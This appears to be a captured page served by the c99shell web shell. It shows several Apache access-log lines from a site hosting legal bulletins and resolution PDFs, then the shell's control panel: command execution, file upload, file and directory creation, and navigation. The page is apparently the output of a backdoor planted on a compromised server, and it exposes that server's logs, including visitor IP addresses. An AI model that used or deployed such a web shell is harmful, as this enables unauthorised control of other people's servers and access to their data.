172.22.2.4 - - [04/Feb/2023:23:55:36 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
69.63.184.4 - - [04/Feb/2023:23:56:17 -0500] "GET /images/IMG_3028%20(1).jpg HTTP/1.1" 200 435206
172.22.2.4 - - [04/Feb/2023:23:56:32 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [04/Feb/2023:23:56:37 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [04/Feb/2023:23:56:37 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
40.77.167.234 - - [04/Feb/2023:23:56:46 -0500] "GET /galeria/galeria/fotos/Humedal-vaca6G.jpg HTTP/1.1" 200 176858
40.77.167.234 - - [04/Feb/2023:23:56:47 -0500] "GET /bla/resoluciones/autos%202021/6046.pdf HTTP/1.1" 200 370320
172.22.2.4 - - [04/Feb/2023:23:56:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.142 - - [04/Feb/2023:23:58:28 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
172.22.2.4 - - [04/Feb/2023:23:57:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
201.245.192.253 - - [04/Feb/2023:23:58:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
31.148.130.68 - - [04/Feb/2023:23:59:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5669.pdf HTTP/1.1" 200 408450

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.4368 ]--